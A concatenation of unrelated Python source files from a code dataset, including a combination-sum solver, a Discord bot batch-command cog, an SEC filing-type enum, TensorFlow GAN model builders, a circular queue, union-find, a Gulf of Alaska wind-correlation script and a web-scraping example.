frontier = [(0, [])]
while frontier:
partial_sum, nums_so_far = frontier.pop()
if partial_sum == target:
yield nums_so_far
continue
if partial_sum > target:
continue
for num in nums:
if not nums_so_far or num >= nums_so_far[-1]:
frontier.append((partial_sum + num, nums_so_far + [num]))
class Solution():
# @param A : list of integers
# @param B : integer
# @return a list of list of integers
def combinationSum(self, A, B):
unique_nums = list(set(A))
unique_nums.sort(reverse=True)
return list(sum_finding_dfs(unique_nums, B))
a = Solution()
print(a.combinationSum([2,3,6,7], 7))
|
StarcoderdataPython
|
4877403
|
# The MetaCommand Cog, which handles all batch commands.
import os
import discord as dc
from discord.ext import commands
from cogs_textbanks import url_bank, query_bank, response_bank
from bot_common import bot, CONST_AUTHOR, user_or_perms
_cmd_dir = 'cmd'
class BatchCommands(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
if bot.get_cog('ReactRoleTagger'):
pass
print(response_bank.batch_cog_ready)
@commands.group(name='batch')
@commands.bot_has_permissions(send_messages=True)
@user_or_perms(CONST_AUTHOR, administrator=True)
async def batch(self, ctx):
if ctx.invoked_subcommand is None:
await ctx.send(response_bank.batch_usage_format)
@batch.error
async def batch_error(self, ctx, error):
if isinstance(error, commands.BotMissingPermissions):
return
raise error
@batch.command(name='save')
async def batch_save(self, ctx, name):
if not (name.isascii() and name.replace('_', '').isalnum()):
await ctx.send(response_bank.batch_save_name_error)
return
if not (atts := ctx.message.attachments):
await ctx.send(response_bank.batch_save_missing_file)
return
if len(atts) > 1:
await ctx.send(response_bank.batch_save_ambiguous_file)
return
await atts[0].save(os.path.join(_cmd_dir, f'{name}.txt'))
await ctx.send(response_bank.batch_save_confirm.format(name=name))
@batch_save.error
async def batch_save_error(self, ctx, error):
raise error
@batch.command(name='exec')
async def batch_exec(self, ctx, name):
if not os.path.exists(fp := os.path.join(_cmd_dir, f'{name}.txt')):
await ctx.send(response_bank.batch_exec_name_error.format(name=name))
return
await ctx.send(response_bank.batch_exec_start.format(name=name))
with open(fp, 'r') as cmdfile:
msg = ctx.message
for line in cmdfile:
msg.content = line.strip()
try:
await self.bot.process_commands(msg)
except Exception as exc:
await ctx.send(f'{type(exc).__name__}: {"".join(exc.args)}')
raise
@batch_exec.error
async def batch_exec_error(self, ctx, error):
raise error
bot.add_cog(BatchCommands(bot))
|
StarcoderdataPython
|
8007538
|
from enum import Enum
class FilingType(Enum):
"""Available filing types to be used when creating Filing object.
.. versionadded:: 0.1.5
"""
FILING_1 = '1'
FILING_1A = '1-a'
FILING_1E = '1-e'
FILING_1K = '1-k'
FILING_1N = '1-n'
FILING_1SA = '1-sa'
FILING_1U = '1-u'
FILING_1Z = '1-z'
FILING_10 = '10'
FILING_10D = '10-d'
FILING_10K = '10-k'
FILING_10M = '10-m'
FILING_10Q = '10-q'
FILING_11K = '11-k'
FILING_12B25 = '12b-25'
FILING_13F = '13f'
FILING_13H = '13h'
FILING_144 = '144'
FILING_15 = '15'
FILING_15F = '15f'
FILING_17H = '17-h'
FILING_18 = '18'
FILING_18K = '18-k'
FILING_19B4 = '19b-4'
FILING_19B4E = '19b-4(e)'
FILING_19B7 = '19b-7'
FILING_2E = '2-e'
FILING_20F = '20-f'
FILING_24F2 = '24f-2'
FILING_25 = '25'
FILING_3 = '3'
FILING_4 = '4'
FILING_40F = '40-f'
FILING_8K = '8-k'
FILING_ABS15G = 'abs-15g'
FILING_ABSEE = 'abs-ee'
FILING_ADV = 'adv'
FILING_ADVE = 'adv-e'
FILING_ADVH = 'adv-h'
FILING_ADVNR = 'adv-nr'
FILING_ADVW = 'adv-w'
FILING_ATS = 'ats'
FILING_ATSN = 'ats-n'
FILING_ATSR = 'ats-r'
FILING_BD = 'bd'
FILING_BDN = 'bd-n'
FILING_BDW = 'bdw'
FILING_C = 'c'
FILING_CA1 = 'ca-1'
FILING_CB = 'cb'
FILING_CFPORTAL = 'cfportal'
FILING_CUSTODY = 'custody'
FILING_D = 'd'
FILING_DEF_14A = 'def 14a'
FILING_F1 = 'f-1'
FILING_F10 = 'f-10'
FILING_F3 = 'f-3'
FILING_F4 = 'f-4'
FILING_F6 = 'f-6'
FILING_F7 = 'f-7'
FILING_F8 = 'f-8'
FILING_F80 = 'f-80'
FILING_FN = 'f-n'
FILING_FX = 'f-x'
FILING_ID = 'id'
FILING_MA = 'ma'
FILING_MAI = 'ma-i'
FILING_MANR = 'ma-nr'
FILING_MAW = 'ma-w'
FILING_MSD = 'msd'
FILING_MSDW = 'msdw'
FILING_N14 = 'n-14'
FILING_N17D1 = 'n-17d-1'
FILING_N17F1 = 'n-17f-1'
FILING_N17F2 = 'n-17f-2'
FILING_N18F1 = 'n-18f-1'
FILING_N1A = 'n-1a'
FILING_N2 = 'n-2'
FILING_N23C3 = 'n-23c-3'
FILING_N27D1 = 'n27d-1'
FILING_N3 = 'n-3'
FILING_N4 = 'n-4'
FILING_N5 = 'n-5'
FILING_N54A = 'n-54a'
FILING_N54C = 'n-54c'
FILING_N6 = 'n-6'
FILING_N6EI1 = 'n-6ei-1'
FILING_N6F = 'n-6f'
FILING_N8A = 'n-8a'
FILING_N8B2 = 'n-8b-2'
FILING_N8B4 = 'n-8b-4'
FILING_N8F = 'n-8f'
FILING_NCEN = 'n-cen'
FILING_NCR = 'n-cr'
FILING_NCSR = 'n-csr'
FILING_NCSRS = 'n-csrs'
FILING_NLIQUID = 'n-liquid'
FILING_NMFP = 'n-mfp'
FILING_NPORT = 'nport'
FILING_NPORTP = 'nport-p'
FILING_NPORTEX = 'nport-ex'
FILING_NPX = 'n-px'
FILING_NQ = 'n-q'
FILING_NRSRO = 'nrsro'
FILING_PF = 'pf'
FILING_PILOT = 'pilot'
FILING_R31 = 'r31'
FILING_S1 = 's-1'
FILING_S11 = 's-11'
FILING_S20 = 's-20'
FILING_S3 = 's-3'
FILING_S4 = 's-4'
FILING_S6 = 's-6'
FILING_S8 = 's-8'
FILING_SBSE = 'sbse'
FILING_SBSEA = 'sbse-a'
FILING_SBSEBD = 'sbse-bd'
FILING_SBSEC = 'sbse-c'
FILING_SBSEW = 'sbse-w'
FILING_SCI = 'sci'
FILING_SD = 'sd'
FILING_SDR = 'sdr'
FILING_SE = 'se'
FILING_SF1 = 'sf-1'
FILING_SF3 = 'sf-3'
FILING_SIP = 'sip'
FILING_T1 = 't-1'
FILING_T2 = 't-2'
FILING_T3 = 't-3'
FILING_T4 = 't-4'
FILING_T6 = 't-6'
FILING_TA1 = 'ta-1'
FILING_TA2 = 'ta-2'
FILING_TAW = 'ta-w'
FILING_TCR = 'tcr'
FILING_TH = 'th'
FILING_WBAPP = 'wb-app'
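    # Usage sketch (illustrative): members map to the lowercase form strings, e.g.
    # FilingType.FILING_10K.value == '10-k' and FilingType('8-k') is FilingType.FILING_8K.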
|
StarcoderdataPython
|
6551062
|
#%%
import tensorflow as tf
import tensorflow.keras as K
from tensorflow.keras import layers
#%%
def build_encoder(PARAMS):
x = layers.Input((PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']))
dims = [8, 16, 32, 64]
skip = x
for i in range(PARAMS['n_layer']):
skip = layers.Conv2D(filters = dims[i], kernel_size = 3, strides = 2, padding = 'same')(skip)
skip = layers.BatchNormalization()(skip)
skip = layers.LeakyReLU(0.2)(skip)
h = layers.Conv2D(filters = dims[i], kernel_size = 3, strides = 1, padding = 'same')(skip)
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
# h = layers.Conv2D(filters = dims[i], kernel_size = 3, strides = 1, padding = 'same')(h)
# h = layers.BatchNormalization()(h)
# h = layers.LeakyReLU(0.2)(h)
skip = h + skip
mean = layers.Dense(PARAMS['latent_dim'])(layers.Flatten()(skip))
logvar = layers.Dense(PARAMS['latent_dim'])(layers.Flatten()(skip))
E = K.models.Model(x, [mean, logvar])
# E.summary()
return E
#%%
def build_generator(PARAMS):
z = layers.Input(PARAMS['latent_dim'])
y = layers.Input(PARAMS['class_num'])
hy = layers.Dense(4, use_bias=False)(y)[..., tf.newaxis]
hy = tf.matmul(hy, hy, transpose_b=True)[..., tf.newaxis]
h = layers.Reshape((4, 4, 16))(z)
h = layers.Concatenate()([h, hy])
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
dims = [128, 64, 32]
skip = h
for i in range(3):
skip = layers.Conv2DTranspose(filters = dims[i], kernel_size = 5, strides = 2, padding = 'same', use_bias=False)(skip)
skip = layers.BatchNormalization()(skip)
skip = layers.ReLU()(skip)
h = layers.Conv2D(filters = dims[i], kernel_size = 5, strides = 1, padding = 'same', use_bias=False)(skip)
h = layers.BatchNormalization()(h)
h = layers.ReLU()(h)
# h = layers.Conv2D(filters = dims[i], kernel_size = 5, strides = 1, padding = 'same', use_bias=False)(h)
# h = layers.BatchNormalization()(h)
# h = layers.ReLU()(h)
skip = h + skip
h = layers.Conv2DTranspose(3, (5, 5), strides=1, padding='same', use_bias=False, activation='tanh')(skip)
G = K.models.Model([z, y], h)
# G.summary()
return G
#%%
# def build_generator(PARAMS):
# z = layers.Input(PARAMS['latent_dim'])
# y = layers.Input((PARAMS['class_num']))
# hz = layers.Dense(PARAMS['latent_dim'], input_shape = [PARAMS['latent_dim']])(z)
# hz = layers.LeakyReLU(0.2)(hz)
# hz = layers.Dense(PARAMS['latent_dim'], input_shape = [PARAMS['latent_dim']])(hz)
# hz = layers.LeakyReLU(0.2)(hz)
# hy = layers.Dense(PARAMS['latent_dim'])(y)
# hy = layers.LeakyReLU(0.2)(hy)
# h = layers.Dense(512)(layers.Concatenate()([hz, hy]))
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(1024)(layers.Concatenate()([h, hy]))
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(3072, activation='sigmoid')(layers.Concatenate()([h, hy]))
# h = tf.reshape(h, [-1, PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']])
# # h = tf.reshape(h, [-1, 8, 8, 32])
# # h = layers.Conv2D(filters = 32, kernel_size = 3, padding = 'same')(h)
# # h = layers.LeakyReLU(0.2)(h)
# # h = layers.UpSampling2D(size=(2, 2), interpolation='bilinear')(h)
# # h = layers.Conv2D(filters = 16, kernel_size = 3, padding = 'same')(h)
# # h = layers.LeakyReLU(0.2)(h)
# # h = layers.UpSampling2D(size=(2, 2), interpolation='bilinear')(h)
# # h = layers.Conv2D(filters = 3, kernel_size = 1, activation='sigmoid', padding = 'same')(h)
# G = K.models.Model([z, y], h)
# # G.summary()
# return G
#%%
def build_discriminator(PARAMS):
x = layers.Input([PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']])
h = layers.Conv2D(filters = 64, kernel_size = 5, strides = 2, padding = 'same')(x)
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dropout(0.3)(h)
h = layers.Conv2D(filters = 128, kernel_size = 5, strides = 2, padding = 'same')(h)
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dropout(0.3)(h)
h = layers.Conv2D(filters = 256, kernel_size = 5, strides = 2, padding = 'same')(h)
h = layers.BatchNormalization()(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dropout(0.3)(h)
h = layers.Flatten()(h)
dis = layers.Dense(1, activation='sigmoid')(h)
cls = layers.Dense(PARAMS['class_num'], activation='softmax')(h)
D = K.models.Model(inputs = x, outputs = [dis, cls])
# D.summary()
return D
#%%
# def build_image_classifier(PARAMS):
# x = layers.Input([PARAMS['data_dim'], PARAMS['data_dim'], PARAMS['channel']])
# # h = layers.Conv2D(filters = 8, kernel_size = 3, strides = 2, padding = 'same')(x)
# # h = layers.LeakyReLU(0.2)(h)
# h = layers.Flatten()(x)
# h = layers.Dense(1024)(h)
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(512)(h)
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(128)(h)
# h = layers.LeakyReLU(0.2)(h)
# h = layers.Dense(PARAMS['class_num'], activation='softmax')(h)
# D = K.models.Model(inputs = x, outputs = h)
# # D.summary()
# return D
#%%
def build_z_discriminator(PARAMS):
x = layers.Input([PARAMS['latent_dim']])
h = layers.Dense(1024)(x)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(512)(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(256)(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(128)(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(64)(h)
h = layers.LeakyReLU(0.2)(h)
h = layers.Dense(1, activation='sigmoid')(h)
D = K.models.Model(inputs = x, outputs = h)
# D.summary()
return D
#%%
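# Illustrative wiring of the builders above; the PARAMS values are assumptions for a
# 32x32 RGB dataset with 10 classes, not settings taken from elsewhere in the project.
# PARAMS = {'data_dim': 32, 'channel': 3, 'n_layer': 4,
#           'latent_dim': 256, 'class_num': 10}
# encoder = build_encoder(PARAMS)
# generator = build_generator(PARAMS)
# discriminator = build_discriminator(PARAMS)
# z_discriminator = build_z_discriminator(PARAMS)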
|
StarcoderdataPython
|
65040
|
<reponame>smartx-jshan/Coding_Practice<gh_stars>0
class MyCircularQueue:
def __init__(self, k: int):
self.q = [None] * k
self.maxlen = k
self.front = 0
self.rear = 0
def enQueue(self, value: int) -> bool:
if self.q[self.rear] is None:
self.q[self.rear] = value
self.rear = (self.rear + 1 ) % self.maxlen
return True
return False
def deQueue(self) -> bool:
if self.front == self.rear and self.q[self.front] is None:
return False
self.q[self.front] = None
self.front = (self.front +1) % self.maxlen
return True
def Front(self) -> int:
if self.q[self.front] is None:
return -1
return self.q[self.front]
def Rear(self) -> int:
if self.q[self.rear -1] is None:
return -1
return self.q[self.rear-1]
def isEmpty(self) -> bool:
if self.front == self.rear and self.q[self.rear] is None:
return True
return False
def isFull(self) -> bool:
if self.front == self.rear and self.q[self.rear] is not None:
return True
return False
# Your MyCircularQueue object will be instantiated and called as such:
# obj = MyCircularQueue(k)
# param_1 = obj.enQueue(value)
# param_2 = obj.deQueue()
# param_3 = obj.Front()
# param_4 = obj.Rear()
# param_5 = obj.isEmpty()
# param_6 = obj.isFull()
|
StarcoderdataPython
|
11243665
|
import typing
class UnionFind():
def __init__(
self,
n: int,
) -> typing.NoReturn:
self.__a = [-1] * n
def find(
self,
u: int,
) -> int:
a = self.__a
if a[u] < 0: return u
a[u] = self.find(a[u])
return a[u]
def unite(
self,
u: int,
v: int,
) -> typing.NoReturn:
u = self.find(u)
v = self.find(v)
if u == v: return
a = self.__a
if a[u] > a[v]: u, v = v, u
a[u] += a[v]
a[v] = u
def same(
self,
u: int,
v: int,
) -> bool:
return self.find(u) == self.find(v)
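# Usage sketch (illustrative): union-find with path compression and union by size.
# uf = UnionFind(5)
# uf.unite(0, 1); uf.unite(1, 2)
# uf.same(0, 2)  # True
# uf.same(0, 3)  # False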
def solve(
n: int,
uv1: typing.List[typing.Iterator[int]],
uv2: typing.List[typing.Iterator[int]],
) -> typing.NoReturn:
uf1 = UnionFind(n)
uf2 = UnionFind(n)
for u, v in uv1:
uf1.unite(u, v)
for u, v in uv2:
uf2.unite(u, v)
res = []
for i in range(n - 1):
for j in range(i + 1, n):
if uf1.same(i, j) or uf2.same(i, j):
continue
uf1.unite(i, j)
uf2.unite(i, j)
res.append((i + 1, j + 1))
print(len(res))
for x in res:
print(*x)
def main() -> typing.NoReturn:
n, m1, m2 = map(int, input().split())
uv1 = [
map(lambda x: int(x) - 1, input().split())
for _ in range(m1)
]
uv2 = [
map(lambda x: int(x) - 1, input().split())
for _ in range(m2)
]
solve(n, uv1, uv2)
main()
|
StarcoderdataPython
|
82714
|
<gh_stars>0
#!/usr/bin/env
"""
GOA_Winds_StormPatterns.py
Compare Gorepoint/globec winds (along shore) to teleconnection indices
GorePoint - 58deg 58min N, 150deg 56min W
and Globec3 59.273701N, 148.9653W
Files are created by GOA_Winds_NARR_model_prep.py
-Filtered NARR winds with a triangular filter (1/4, 1/2, 1/4) and output every 3hrs
-Provided U, V
-Saved in EPIC NetCDF standard
"""
#System Stack
import datetime
import sys
#Science Stack
import numpy as np
from scipy import stats
# User Stack
from utilities import ncutilities as ncutil
# Visual Stack
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter, MonthLocator
__author__ = '<NAME>'
__email__ = '<EMAIL>'
__created__ = datetime.datetime(2014, 04, 29)
__modified__ = datetime.datetime(2014, 04, 29)
__version__ = "0.1.0"
__status__ = "Development"
__keywords__ = 'NARR','GLOBEC3', 'Gorept','AO/NAO/PNA', 'U,V','Winds', 'Gulf of Alaska'
"""------------------------General Modules-------------------------------------------"""
def from_netcdf(infile):
""" Uses ncreadfile_dic which returns a dictionary of all data from netcdf"""
###nc readin/out
nchandle = ncutil.ncopen(infile)
params = ncutil.get_vars(nchandle) #gets all of them
ncdata = ncutil.ncreadfile_dic(nchandle, params)
ncutil.ncclose(nchandle)
return (ncdata, params)
def date2pydate(file_time, file_time2=None, file_flag='EPIC'):
""" Ingest EPIC date or NCEP Date and provide python serial date"""
if file_flag == 'EPIC':
ref_time_py = datetime.datetime.toordinal(datetime.datetime(1968, 5, 23))
ref_time_epic = 2440000
offset = ref_time_epic - ref_time_py
try: #if input is an array
python_time = [None] * len(file_time)
for i, val in enumerate(file_time):
pyday = file_time[i] - offset
pyfrac = file_time2[i] / (1000. * 60. * 60.* 24.) #milliseconds in a day
python_time[i] = (pyday + pyfrac)
except:
pyday = file_time - offset
pyfrac = file_time2 / (1000. * 60. * 60.* 24.) #milliseconds in a day
python_time = (pyday + pyfrac)
elif file_flag == 'NARR':
""" Hours since 1800-1-1"""
base_date=datetime.datetime.strptime('1800-01-01','%Y-%m-%d').toordinal()
python_time = file_time / 24. + base_date
elif file_flag == 'NCEP':
""" Hours since 1800-1-1"""
base_date=datetime.datetime.strptime('1800-01-01','%Y-%m-%d').toordinal()
python_time = file_time / 24. + base_date
elif file_flag == 'Index':
""" yyyy mm dd"""
python_time=datetime.datetime.strptime(file_time,'%Y %m %d').toordinal()
else:
print "time flag not recognized"
sys.exit()
return python_time
"""------------------------- MATH Modules -------------------------------------------"""
def hourly_2_ave(ltbound,utbound, time, data, time_base=6.):
""" bin average times into specified bins """
interval = time_base / 24.
tarray = np.arange(ltbound, utbound,interval)
dmean = np.zeros_like(tarray) * np.nan
dstd = np.zeros_like(tarray) * np.nan
for i, val in enumerate(tarray):
ind = (time >= val) & (time < val+interval)
dmean[i] = data[ind].mean()
dstd[i] = data[ind].std()
return { 'dtime':tarray, 'dmean':dmean ,'dstd':dstd,}
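# Usage sketch (illustrative): bin a 3-hourly wind record into daily means, where
# `t` is time in serial days and `u` is the matching data array.
#   daily = hourly_2_ave(t.min(), t.max(), t, u, time_base=24.)
#   daily['dtime'], daily['dmean'], daily['dstd']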
def rotate_coord(angle_rot, mag, direct):
""" converts math coords to along/cross shelf.
+ onshore / along coast with land to right (right handed)
- offshore / along coast with land to left
        Todo: convert to met standard for winds (left-handed coordinate system)
"""
direct = direct - angle_rot
along = mag * np.sin(np.deg2rad(direct))
cross = mag * np.cos(np.deg2rad(direct))
return (along, cross)
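# Worked example: with a rotation angle of 120 degrees, a wind of magnitude 10 from a
# math direction of 210 degrees gives rotate_coord(120., 10., 210.) ->
# (along, cross) ~= (10.0, 0.0), i.e. the signal falls entirely in the along component.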
def lin_fit(x, y):
""" scipy linear regression routine"""
slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)
return ( slope, intercept, r_value, p_value, std_err )
def moving_average(x, n, type='simple'):
"""
compute an n period moving average.
type is 'simple' | 'exponential'
"""
#x = np.asarray(x)
if type=='simple':
weights = np.ones(n)
else:
weights = np.exp(np.linspace(-1., 0., n))
weights /= weights.sum()
a = np.convolve(x, weights, mode='full')[:len(x)]
a[:n] = a[n]
return a
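# Usage sketch (illustrative): a 30-point simple moving average of a daily series;
# the output has the same length as the input and the first n entries are
# back-filled with a[n].
#   smoothed = moving_average(daily_series, 30)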
"""------------------------- Main Modules -------------------------------------------"""
### READ AO/PNA indices from txt file
AO_file = '/Users/bell/Data_Local/teleconnections/norm.daily.ao.index.b500101.current.ascii'
PNA_file = '/Users/bell/Data_Local/teleconnections/norm.daily.pna.index.b500101.current.ascii'
# ingest indices
PNA_index, PNA_time = [], [] #some missing ind
with open(PNA_file, 'rb') as f:
for k, line in enumerate(f.readlines()):
PNA_index = PNA_index + [line.strip().split()[-1]]
PNA_time = PNA_time + [date2pydate(" ".join(line.strip().split()[:-1]), file_flag='Index')]
PNA_index= np.array(PNA_index, float)
PNA_time= np.array(PNA_time)
AO_index, AO_time = [], [] #some missing ind
with open(AO_file, 'rb') as f:
for k, line in enumerate(f.readlines()):
AO_index = AO_index + [line.strip().split()[-1]]
AO_time = AO_time + [date2pydate(" ".join(line.strip().split()[:-1]), file_flag='Index')]
AO_index= np.array(AO_index, float)
AO_time= np.array(AO_time)
### NARR wind files (preprocessed) for specific locations - winds have a triangle filter on them
NARR = '/Users/bell/Programs/Python/FOCI_Analysis/GOA_Winds/data/'
station_name = ['Globec3','GorePt']
sta_lat = [59.273701,58.9666666666666667]
sta_long = [148.9653,150.9333333333333333]
#loop over all requested data
years = range(1984, 2014,1)
NARR_time = []
NARR_uwnd = []
NARR_vwnd = []
for iyear in years:
globec3_data, NARRkeys = from_netcdf(NARR+'NARR_globec_'+str(iyear)+'.nc')
NARR_time = NARR_time + date2pydate(globec3_data['time'], globec3_data['time2'])
NARR_uwnd = np.append(NARR_uwnd, globec3_data['WU_422'][:,0,0,0])
NARR_vwnd = np.append(NARR_vwnd, globec3_data['WV_423'][:,0,0,0])
NARR_time = np.array(NARR_time)
### daily averages
time_bin = 24.
NARRDaily_uwnd = hourly_2_ave(NARR_time.min(),NARR_time.max(), NARR_time, NARR_uwnd, time_base=time_bin)
NARRDaily_vwnd = hourly_2_ave(NARR_time.min(),NARR_time.max(), NARR_time, NARR_vwnd, time_base=time_bin)
NARR_wndmag = np.sqrt((NARRDaily_uwnd['dmean']**2)+(NARRDaily_vwnd['dmean']**2))
NARR_wind_dir_math = np.rad2deg(np.arctan2(NARRDaily_vwnd['dmean'] , NARRDaily_uwnd['dmean']))
NARR_along,NARR_across = rotate_coord(120., NARR_wndmag, NARR_wind_dir_math)
"""----"""
# Calculate correlations for 3month spans
corr_PNA = {}
corr_AO = {}
for drange in range(1980,2014,1):
for mrange in range(1,12,3):
start_ind = datetime.datetime.strptime(str(drange) + ' ' + str(mrange) + ' 01','%Y %m %d').toordinal()
end_ind = datetime.datetime.strptime(str(drange) + ' ' + str(mrange+2) + ' 01','%Y %m %d').toordinal()
PNA_ind = (PNA_time >= start_ind) & (PNA_time <= end_ind)
AO_ind = (AO_time >= start_ind) & (AO_time <= end_ind)
NARR_ind = (NARRDaily_uwnd['dtime'] >= start_ind) & (NARRDaily_uwnd['dtime'] <= end_ind)
# NARR_along_stand = (NARR_along - np.nanmean(NARR_along)) / np.nanstd(NARR_along)
# NARR_along_stand = (NARR_along - np.nanmin(NARR_along)) / (np.nanmax(NARR_along) - np.nanmin(NARR_along)) #actually normalized - ignor var name
# PNA_index_stand = (PNA_index - np.nanmean(PNA_index)) / (np.nanstd(PNA_index))
# PNA_index_stand = (PNA_index - np.nanmin(PNA_index)) / (np.nanmax(PNA_index) - np.nanmin(PNA_index)) #actually normalized - ignor var name
if not np.size(NARR_along[NARR_ind]) == 0:
#(slope, intercept, r_value, p_value, std_err) = lin_fit(NARR_along_stand[NARR_ind], PNA_index[PNA_ind])
#corr[start_ind] = r_value**2
corr_PNA[start_ind] = np.corrcoef(NARR_along[NARR_ind], PNA_index[PNA_ind])[0][1]
            corr_AO[start_ind] = np.corrcoef(NARR_along[NARR_ind], AO_index[AO_ind])[0][1]
else:
corr_PNA[start_ind] = 0.0
corr_AO[start_ind] = 0.0
# 30day running filter for wind timeseries
NARR_along_rm = moving_average(NARR_along,(30))
AO_index_rm = moving_average(AO_index,(30))
PNA_index_rm = moving_average(PNA_index,(30))
"""------------------------- Plotting Modules -------------------------------------------"""
year_bounds = [[datetime.datetime.strptime('1980 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1985 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1990 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1995 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2000 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2005 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2010 01 01','%Y %m %d').toordinal()],
[datetime.datetime.strptime('1985 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1990 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('1995 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2000 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2005 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2010 01 01','%Y %m %d').toordinal(),
datetime.datetime.strptime('2015 01 01','%Y %m %d').toordinal()]]
fig = plt.figure()
for splot in range(0,7,1):
ax1 = plt.subplot(7,1,splot+1)
plt.plot(NARRDaily_uwnd['dtime'], NARR_along_rm, 'r')
for i,kk in enumerate(corr_PNA.keys()):
if (corr_PNA[kk]) >=.2 and (corr_PNA[kk]) <=.3:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.1)
elif (corr_PNA[kk]) >=.3 and (corr_PNA[kk]) <=.4:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.3)
elif (corr_PNA[kk]) >=.4 and (corr_PNA[kk]) <=.5:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.5)
elif (corr_PNA[kk]) >=.5:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.8)
elif (corr_PNA[kk]) <=-0.2 and (corr_PNA[kk]) >=-0.3:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.1)
elif (corr_PNA[kk]) <=-0.3 and (corr_PNA[kk]) >=-0.4:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.3)
elif (corr_PNA[kk]) <=-0.4 and (corr_PNA[kk]) >=-0.5:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.5)
elif (corr_PNA[kk]) <=-0.5:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.8)
ax1.set_ylim((-10,10))
ax2 = ax1.twinx()
plt.plot(PNA_time, PNA_index_rm, 'b')
ax2.xaxis.set_major_formatter(DateFormatter('%b %Y'))
ax2.set_ylim((-3,3))
ax2.set_xlim(year_bounds[0][splot],year_bounds[1][splot])
ax2.xaxis.set_major_locator(MonthLocator(bymonth=[3,10], bymonthday=1))
fig.suptitle('NARR Along-Shore Winds corr PNA Index at Globec3')
DefaultSize = fig.get_size_inches()
fig.set_size_inches( (DefaultSize[0]*2, DefaultSize[1]*2) )
plt.savefig('NARR_along_PNA_globec.png', bbox_inches='tight', dpi = (100))
plt.close()
fig = plt.figure()
for splot in range(0,7,1):
ax1 = plt.subplot(7,1,splot+1)
plt.plot(NARRDaily_uwnd['dtime'], NARR_along_rm, 'r')
for i,kk in enumerate(corr_AO.keys()):
if (corr_AO[kk]) >=.2 and (corr_AO[kk]) <=.3:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.1)
elif (corr_AO[kk]) >=.3 and (corr_AO[kk]) <=.4:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.3)
elif (corr_AO[kk]) >=.4 and (corr_AO[kk]) <=.5:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.5)
elif (corr_AO[kk]) >=.5:
fill1 = ax1.axvspan(kk, kk+90, color='k', alpha=0.8)
elif (corr_AO[kk]) <=-0.2 and (corr_AO[kk]) >=-0.3:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.1)
elif (corr_AO[kk]) <=-0.3 and (corr_AO[kk]) >=-0.4:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.3)
elif (corr_AO[kk]) <=-0.4 and (corr_AO[kk]) >=-0.5:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.5)
elif (corr_AO[kk]) <=-0.5:
fill1 = ax1.axvspan(kk, kk+90, color='r', alpha=0.8)
ax1.set_ylim((-10,10))
ax2 = ax1.twinx()
plt.plot(AO_time, AO_index_rm, 'b')
ax2.xaxis.set_major_formatter(DateFormatter('%b %Y'))
ax2.set_ylim((-3,3))
ax2.set_xlim(year_bounds[0][splot],year_bounds[1][splot])
ax2.xaxis.set_major_locator(MonthLocator(bymonth=[3,10], bymonthday=1))
fig.suptitle('NARR Along-Shore Winds corr AO Index at Globec3')
DefaultSize = fig.get_size_inches()
fig.set_size_inches( (DefaultSize[0]*2, DefaultSize[1]*2) )
plt.savefig('NARR_along_AO_globec.png', bbox_inches='tight', dpi = (100))
plt.close()
|
StarcoderdataPython
|
6459651
|
<reponame>yanweiqiang/scrapingBook<gh_stars>0
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib.error import URLError
from bs4 import BeautifulSoup
myUrl = "http://www.pythonscraping.com/pages/page1.html"
def get_title(url):
title = ""
try:
html = urlopen(url)
bs = BeautifulSoup(html.read(), 'html5lib')
title = bs.h1
print(bs.h1)
print(bs.find('nonExistingTag').find('anotherTag'))
except HTTPError as e:
print(e)
except URLError as e:
print('The server could not be found!')
except AttributeError as e:
print('Tag was not found!')
else:
print('It worked!')
return title
print(get_title(myUrl))
|
StarcoderdataPython
|
5009976
|
<reponame>iamjavaexpert/Kamodo
import os, sys; sys.path.append(os.path.dirname(os.path.realpath(__file__)))
from kamodo.kamodo import *
from kamodo.util import *
|
StarcoderdataPython
|
9605711
|
from enum import Enum
class HomologyTypes(Enum):
"""
Core homology relations from RO
"""
